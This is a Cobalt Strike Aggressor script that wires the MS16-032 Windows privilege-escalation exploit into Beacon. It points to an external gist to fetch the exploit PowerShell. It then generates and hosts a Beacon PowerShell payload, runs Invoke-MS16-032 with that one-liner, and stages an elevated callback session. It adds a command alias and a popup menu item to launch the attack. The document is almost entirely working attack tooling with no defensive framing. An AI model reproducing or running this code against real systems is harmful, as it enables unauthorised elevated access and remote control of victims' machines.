Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.

ms16-032.cna

# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1 
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

# logic to run this particular attack
sub exploit {
	local('$script $oneliner');

	# acknowledge this command
	btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");

	# generate a PowerShell script to run our Beacon listener
	$script = artifact($2, "powershell");

	# host this script within this Beacon
	$oneliner = beacon_host_script($1, $script);

	# task Beacon to run this exploit with our one-liner that runs Beacon
	bpowershell_import($1, script_resource("MS16-032.ps1"));
	bpowerpick($1, "Invoke-MS16-032 \" $+ $oneliner $+ \"");

	# complete the staging process
	bstage($1, $null, $2);
}

# an alias to run this attack, use:
# beacon> ms16-032 "listener name"
# beacon> ms16-032
alias ms16-032 {
	if ($2 is $null) {
		openPayloadHelper(lambda({
			exploit($bid, $1);
		}, $bid => $1));
	}
	else if (listener_info($2) is $null) {
		berror($1, "Could not find listener $2");
	}
	else {
		exploit($1, $2);
	}
}

# register help for this command
beacon_command_register("ms16-032", "Runs ms16-032 privilege escalation", "Synopsis: ms16-032 \"[listener]\"\n\nExecute this attack");

# create a popup menu to launch this attack too!
popup beacon_bottom {
	item "&ms16-032" {
		openPayloadHelper(lambda({
			openOrActivate($bids);
			binput($bids, "ms16-032 \" $+ $1 $+ \"");
			exploit($bids, $1);
		}, $bids => $1));
	}
}